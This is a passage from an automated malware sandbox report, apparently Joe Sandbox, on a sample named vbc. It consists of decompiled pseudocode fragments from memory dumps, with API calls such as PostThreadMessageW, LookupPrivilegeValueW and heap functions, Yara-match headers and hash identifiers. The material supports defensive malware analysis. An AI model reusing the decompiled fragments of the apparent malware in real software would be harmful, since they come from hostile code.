                                              					__esi = __esi - 1;
                                              					asm("das");
                                              					asm("loop 0x58");
                                              					__esi = __eax;
                                              					__eax = E0041B7B0(__ecx);
                                              					__eax = __eax + __esi + 0x1000;
                                              					__esi = __esi;
                                              					return __eax;
                                              				}
                                              			}



                                              0x00407649
                                              0x00407629
                                              0x0040762d
                                              0x0040764b
                                              0x0040764b
                                              0x0040764e
                                              0x0040764f
                                              0x0040765e
                                              0x00407660
                                              0x00407665
                                              0x0040766c
                                              0x0040766d
                                              0x0040766d

                                              APIs
                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004076DA
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MessagePostThread
                                              • String ID:
                                              • API String ID: 1836367815-0
                                              • Opcode ID: 2cdd4d14d0e017872e6a032a06e3fc2351971139e764dec989e95496a5714a34
                                              • Instruction ID: 65418023749dded0563ca6f36eb900a0dc795f2cd1bf22a836154a5418c3b2bc
                                              • Opcode Fuzzy Hash: 2cdd4d14d0e017872e6a032a06e3fc2351971139e764dec989e95496a5714a34
                                              • Instruction Fuzzy Hash: BB11AF31E4465937D7319A385C42FEE77489F41760F0841AFFA44AB1C2E699690682D6
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 212 407680-4076bd call 41bf90 call 41cb70 call 40a140 219 4076c3-4076ca 212->219 220 4076be call 415aa0 212->220 221 4076cc-4076de PostThreadMessageW 219->221 222 4076fe-407702 219->222 220->219 223 4076e0-4076fa call 4098a0 221->223 224 4076fd 221->224 223->224 224->222
                                              C-Code - Quality: 82%
                                              			E00407680(void* __eflags, intOrPtr _a4, long _a8) {
                                              				char _v67;
                                              				char _v68;
                                              				void* _t12;
                                              				intOrPtr* _t13;
                                              				int _t14;
                                              				long _t21;
                                              				intOrPtr* _t25;
                                              				void* _t26;
                                              
                                              				_v68 = 0;
                                              				E0041BF90( &_v67, 0, 0x3f);
                                              				E0041CB70( &_v68, 3);
                                              				_t12 = E0040A140(_a4 + 0x20,  &_v68); // executed
                                              				_t13 = E00415AA0(_a4 + 0x20, _t12, 0, 0, 0xc4e7b6d6);
                                              				_t25 = _t13;
                                              				if(_t25 != 0) {
                                              					_t21 = _a8;
                                              					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                              					_t32 = _t14;
                                              					if(_t14 == 0) {
                                              						_t14 =  *_t25(_t21, 0x8003, _t26 + (E004098A0(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                              					}
                                              					return _t14;
                                              				}
                                              				return _t13;
                                              			}











                                              0x0040768f
                                              0x00407693
                                              0x0040769e
                                              0x004076ae
                                              0x004076be
                                              0x004076c3
                                              0x004076ca
                                              0x004076cd
                                              0x004076da
                                              0x004076dc
                                              0x004076de
                                              0x004076fb
                                              0x004076fb
                                              0x00000000
                                              0x004076fd
                                              0x00407702

                                              APIs
                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004076DA
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MessagePostThread
                                              • String ID:
                                              • API String ID: 1836367815-0
                                              • Opcode ID: 987d68c3a03c8d498e9c25042e05d46bb8873fa97b0269841de7b22953abdee4
                                              • Instruction ID: 724692d215f1cdb5ed0721353eb2d7bb8a3c5ff321720c45d76a988cf6dc1689
                                              • Opcode Fuzzy Hash: 987d68c3a03c8d498e9c25042e05d46bb8873fa97b0269841de7b22953abdee4
                                              • Instruction Fuzzy Hash: A401A731A8022877E720A6959C43FFE776C9F45B54F04412AFF04FA1C1EAE9790647EA
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 254 41a5e0-41a611 call 41af60 RtlAllocateHeap
                                              C-Code - Quality: 100%
                                              			E0041A5E0(intOrPtr _a4, void* _a8, long _a12, long _a16) {
                                              				void* _t10;
                                              
                                              				E0041AF60( *((intOrPtr*)(_a4 + 0x14)), _a4, _t7 + 0xc8c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
                                              				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
                                              				return _t10;
                                              			}




                                              0x0041a5f7
                                              0x0041a60d
                                              0x0041a611

                                              APIs
                                              • RtlAllocateHeap.NTDLL(00415186,?,004158FF,004158FF,?,00415186,?,?,?,?,?,00000000,00409113,?), ref: 0041A60D
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 8082421df8bc89d162f2638fa4c1385792dc10d17e44cb2d46fb0fb817fbd62f
                                              • Instruction ID: 5112eb7d04df1d6e50f339e712a9d98793db7acbdec2b9c88685dfce6d12f60e
                                              • Opcode Fuzzy Hash: 8082421df8bc89d162f2638fa4c1385792dc10d17e44cb2d46fb0fb817fbd62f
                                              • Instruction Fuzzy Hash: 0EE01AB12002086BDB14DF49DC45E9737ACEF88654F118155BA085B241C530F9108AB5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 257 41a620-41a651 call 41af60 RtlFreeHeap
                                              C-Code - Quality: 100%
                                              			E0041A620(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                              				char _t10;
                                              
                                              				_t3 = _a4 + 0xc90; // 0xc90
                                              				E0041AF60( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
                                              				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                              				return _t10;
                                              			}




                                              0x0041a62f
                                              0x0041a637
                                              0x0041a64d
                                              0x0041a651

                                              APIs
                                              • RtlFreeHeap.NTDLL(00000060,00409113,?,?,00409113,00000060,00000000,00000000,?,?,00409113,?,00000000), ref: 0041A64D
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeHeap
                                              • String ID:
                                              • API String ID: 3298025750-0
                                              • Opcode ID: a6e6f41d857b18798f6d11579541f16a6a166f54801e0754a839ad98261f1417
                                              • Instruction ID: e76337afa916636dc7999d0b0cc11d2e66c0cc36247d0f50dc268ede5031f4cd
                                              • Opcode Fuzzy Hash: a6e6f41d857b18798f6d11579541f16a6a166f54801e0754a839ad98261f1417
                                              • Instruction Fuzzy Hash: 14E012B1200208ABDB14EF89DC49EA737ACEF88764F118159BA085B242C630E9208AB1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 260 41a780-41a7b4 call 41af60 LookupPrivilegeValueW
                                              C-Code - Quality: 100%
                                              			E0041A780(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                              				int _t10;
                                              
                                              				E0041AF60( *((intOrPtr*)(_a4 + 0xa1c)), _a4, _t7 + 0xca8,  *((intOrPtr*)(_a4 + 0xa1c)), 0, 0x46);
                                              				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                              				return _t10;
                                              			}




                                              0x0041a79a
                                              0x0041a7b0
                                              0x0041a7b4

                                              APIs
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040D5C2,0040D5C2,00000041,00000000,?,00409185), ref: 0041A7B0
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LookupPrivilegeValue
                                              • String ID:
                                              • API String ID: 3899507212-0
                                              • Opcode ID: b6c9d2bb7c1b66bb05113664278c8ba5e33a8a1c89f8aae2c7e428828915c1da
                                              • Instruction ID: f191f6caa62469aa0aeb0b25a98ea8bb3e9aa7cd5fa1fede7adac256a7a22315
                                              • Opcode Fuzzy Hash: b6c9d2bb7c1b66bb05113664278c8ba5e33a8a1c89f8aae2c7e428828915c1da
                                              • Instruction Fuzzy Hash: 4EE01AB12002086BDB10DF49CC45EE737ADEF89664F118155BA0C57241C530E8158AB5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 266 41a652-41a658 267 41a667-41a688 call 41af60 ExitProcess 266->267 268 41a65a 266->268 268->267
                                              APIs
                                              • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A688
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID:
                                              • API String ID: 621844428-0
                                              • Opcode ID: e817cc0e679b33e58d17afcce47a469ccb4496809d16147664a3faa912462870
                                              • Instruction ID: f4097edd8bfdf788a7289d32f53fff5c9a201f479a098bc4100019dcd6ecaf01
                                              • Opcode Fuzzy Hash: e817cc0e679b33e58d17afcce47a469ccb4496809d16147664a3faa912462870
                                              • Instruction Fuzzy Hash: C4E0C2B054D3C46ED712EB688C90EC7BFA48F06B08F19459DF4C84B202C634E566D3A9
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 271 41a660-41a679 272 41a67f-41a688 ExitProcess 271->272 273 41a67a call 41af60 271->273 273->272
                                              APIs
                                              • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A688
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID:
                                              • API String ID: 621844428-0
                                              • Opcode ID: 1cfc6acf09b4d581fed35e39f5b9fca2d0b24bba4d46bbacac3375e597e63901
                                              • Instruction ID: 43fab5bc382f8dbf035fa71370f402dcb25f1a4f198c16d6a3d81994ba933d62
                                              • Opcode Fuzzy Hash: 1cfc6acf09b4d581fed35e39f5b9fca2d0b24bba4d46bbacac3375e597e63901
                                              • Instruction Fuzzy Hash: 70D017726002187BD620EB99CC89FD777ACDF49BA4F1580A5BA0C6B242C934BA5187E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 58%
                                              			E00417317(intOrPtr* __ecx) {
                                              				void* _t1;
                                              
                                              				_t1 =  *__ecx();
                                              				_push(ds);
                                              				return _t1 + 1;
                                              			}




                                              0x00417317
                                              0x0041731a
                                              0x00417326

                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 51485c17b489f3608c248a7845fdb5ff7b281aedcfe6ed82c8cbee2375c352ed
                                              • Instruction ID: e3425fe385282f0430888d8fca4db5bb681d3f8174616abd4976eda0fe5f5ced
                                              • Opcode Fuzzy Hash: 51485c17b489f3608c248a7845fdb5ff7b281aedcfe6ed82c8cbee2375c352ed
                                              • Instruction Fuzzy Hash: 88B09226A064089A54150C18B8080B4F724D18313BB1023D7EC09A30104C0384150288
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                              • Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_860000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                              • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                              • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                              • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                              • Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_860000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                              • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                              • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                              • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                              • Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_860000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                              • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                              • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                              • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                              • Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_860000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                              • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                              • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                              • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                              • Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_860000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                              • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                              • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                              • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 38%
                                              			E008C13CB(intOrPtr* _a4, intOrPtr _a8) {
                                              				char _v8;
                                              				intOrPtr _v12;
                                              				intOrPtr* _v16;
                                              				intOrPtr _v20;
                                              				char _v24;
                                              				intOrPtr _t71;
                                              				signed int _t78;
                                              				signed int _t86;
                                              				char _t90;
                                              				signed int _t91;
                                              				signed int _t96;
                                              				intOrPtr _t108;
                                              				signed int _t114;
                                              				void* _t115;
                                              				intOrPtr _t128;
                                              				intOrPtr* _t129;
                                              				void* _t130;
                                              
                                              				_t129 = _a4;
                                              				_t128 = _a8;
                                              				_t116 = 0;
                                              				_t71 = _t128 + 0x5c;
                                              				_v8 = 8;
                                              				_v20 = _t71;
                                              				if( *_t129 == 0) {
                                              					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                              						goto L5;
                                              					} else {
                                              						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                              						if(_t96 != 0) {
                                              							L38:
                                              							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                              								goto L5;
                                              							} else {
                                              								_push( *(_t129 + 0xf) & 0x000000ff);
                                              								_push( *(_t129 + 0xe) & 0x000000ff);
                                              								_push( *(_t129 + 0xd) & 0x000000ff);
                                              								_t86 = L008B7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                              								L36:
                                              								return _t128 + _t86 * 2;
                                              							}
                                              						}
                                              						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                              						if(_t114 == 0) {
                                              							L33:
                                              							_t115 = 0x882926;
                                              							L35:
                                              							_push( *(_t129 + 0xf) & 0x000000ff);
                                              							_push( *(_t129 + 0xe) & 0x000000ff);
                                              							_push( *(_t129 + 0xd) & 0x000000ff);
                                              							_push( *(_t129 + 0xc) & 0x000000ff);
                                              							_t86 = L008B7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                              							goto L36;
                                              						}
                                              						if(_t114 != 0xffff) {
                                              							_t116 = 0;
                                              							goto L38;
                                              						}
                                              						if(_t114 != 0) {
                                              							_t115 = 0x889cac;
                                              							goto L35;
                                              						}
                                              						goto L33;
                                              					}
                                              				} else {
                                              					L5:
                                              					_a8 = _t116;
                                              					_a4 = _t116;
                                              					_v12 = _t116;
                                              					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                              						if( *(_t129 + 0xa) == 0xfe5e) {
                                              							_v8 = 6;
                                              						}
                                              					}
                                              					_t90 = _v8;
                                              					if(_t90 <= _t116) {
                                              						L11:
                                              						if(_a8 - _a4 <= 1) {
                                              							_a8 = _t116;
                                              							_a4 = _t116;
                                              						}
                                              						_t91 = 0;
                                              						if(_v8 <= _t116) {
                                              							L22:
                                              							if(_v8 < 8) {
                                              								_push( *(_t129 + 0xf) & 0x000000ff);
                                              								_push( *(_t129 + 0xe) & 0x000000ff);
                                              								_push( *(_t129 + 0xd) & 0x000000ff);
                                              								_t128 = _t128 + L008B7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                              							}
                                              							return _t128;
                                              						} else {
                                              							L14:
                                              							L14:
                                              							if(_a4 > _t91 || _t91 >= _a8) {
                                              								if(_t91 != _t116 && _t91 != _a8) {
                                              									_push(":");
                                              									_push(_t71 - _t128 >> 1);
                                              									_push(_t128);
                                              									_t128 = _t128 + L008B7707() * 2;
                                              									_t71 = _v20;
                                              									_t130 = _t130 + 0xc;
                                              								}
                                              								_t78 = L008B7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                              								_t130 = _t130 + 0x10;
                                              							} else {
                                              								_push(L"::");
                                              								_push(_t71 - _t128 >> 1);
                                              								_push(_t128);
                                              								_t78 = L008B7707();
                                              								_t130 = _t130 + 0xc;
                                              								_t91 = _a8 - 1;
                                              							}
                                              							_t91 = _t91 + 1;
                                              							_t128 = _t128 + _t78 * 2;
                                              							_t71 = _v20;
                                              							if(_t91 >= _v8) {
                                              								goto L22;
                                              							}
                                              							_t116 = 0;
                                              							goto L14;
                                              						}
                                              					} else {
                                              						_t108 = 1;
                                              						_v16 = _t129;
                                              						_v24 = _t90;
                                              						do {
                                              							if( *_v16 == _t116) {
                                              								if(_t108 - _v12 > _a8 - _a4) {
                                              									_a4 = _v12;
                                              									_a8 = _t108;
                                              								}
                                              								_t116 = 0;
                                              							} else {
                                              								_v12 = _t108;
                                              							}
                                              							_v16 = _v16 + 2;
                                              							_t108 = _t108 + 1;
                                              							_t26 =  &_v24;
                                              							 *_t26 = _v24 - 1;
                                              						} while ( *_t26 != 0);
                                              						goto L11;
                                              					}
                                              				}
                                              			}




















                                              0x008c13d5
                                              0x008c13d9
                                              0x008c13dc
                                              0x008c13de
                                              0x008c13e1
                                              0x008c13e8
                                              0x008c13ee
                                              0x008ee8fd
                                              0x00000000
                                              0x008ee921
                                              0x008ee921
                                              0x008ee928
                                              0x008ee982
                                              0x008ee98a
                                              0x00000000
                                              0x008ee99a
                                              0x008ee99e
                                              0x008ee9a3
                                              0x008ee9a8
                                              0x008ee9b9
                                              0x008ee978
                                              0x00000000
                                              0x008ee978
                                              0x008ee98a
                                              0x008ee92a
                                              0x008ee931
                                              0x008ee944
                                              0x008ee944
                                              0x008ee950
                                              0x008ee954
                                              0x008ee959
                                              0x008ee95e
                                              0x008ee963
                                              0x008ee970
                                              0x00000000
                                              0x008ee975
                                              0x008ee93b
                                              0x008ee980
                                              0x00000000
                                              0x008ee980
                                              0x008ee942
                                              0x008ee94b
                                              0x00000000
                                              0x008ee94b
                                              0x00000000
                                              0x008ee942
                                              0x008c13f4
                                              0x008c13f4
                                              0x008c13f9
                                              0x008c13fc
                                              0x008c13ff
                                              0x008c1406
                                              0x008ee9cc
                                              0x008ee9d2
                                              0x008ee9d2
                                              0x008ee9cc
                                              0x008c140c
                                              0x008c1411
                                              0x008c1431
                                              0x008c143a
                                              0x008c143c
                                              0x008c143f
                                              0x008c143f
                                              0x008c1442
                                              0x008c1447
                                              0x008c14a8
                                              0x008c14ac
                                              0x008ee9e2
                                              0x008ee9e7
                                              0x008ee9ec
                                              0x008eea05
                                              0x008eea05
                                              0x00000000
                                              0x008c1449
                                              0x00000000
                                              0x008c1449
                                              0x008c144c
                                              0x008c1459
                                              0x008c1462
                                              0x008c1469
                                              0x008c146a
                                              0x008c1470
                                              0x008c1473
                                              0x008c1476
                                              0x008c1476
                                              0x008c1490
                                              0x008c1495
                                              0x008c138e
                                              0x008c1390
                                              0x008c1397
                                              0x008c1398
                                              0x008c1399
                                              0x008c13a1
                                              0x008c13a4
                                              0x008c13a4
                                              0x008c1498
                                              0x008c149c
                                              0x008c149f
                                              0x008c14a2
                                              0x00000000
                                              0x00000000
                                              0x008c14a4
                                              0x00000000
                                              0x008c14a4
                                              0x008c1413
                                              0x008c1415
                                              0x008c1416
                                              0x008c1419
                                              0x008c141c
                                              0x008c1422
                                              0x008c13b7
                                              0x008c13bc
                                              0x008c13bf
                                              0x008c13bf
                                              0x008c13c2
                                              0x008c1424
                                              0x008c1424
                                              0x008c1424
                                              0x008c1427
                                              0x008c142b
                                              0x008c142c
                                              0x008c142c
                                              0x008c142c
                                              0x00000000
                                              0x008c141c
                                              0x008c1411

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                              • Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_860000_vbc.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                              • API String ID: 48624451-2108815105
                                              • Opcode ID: 353a85f10c19eeca903fba974784c3f0c63ad3d3bacacc1c5cc2dceebf9a7dec
                                              • Instruction ID: 0d6d8136181e595b8646191786bf4fa643aa54d88bd7356b9060577c63683265
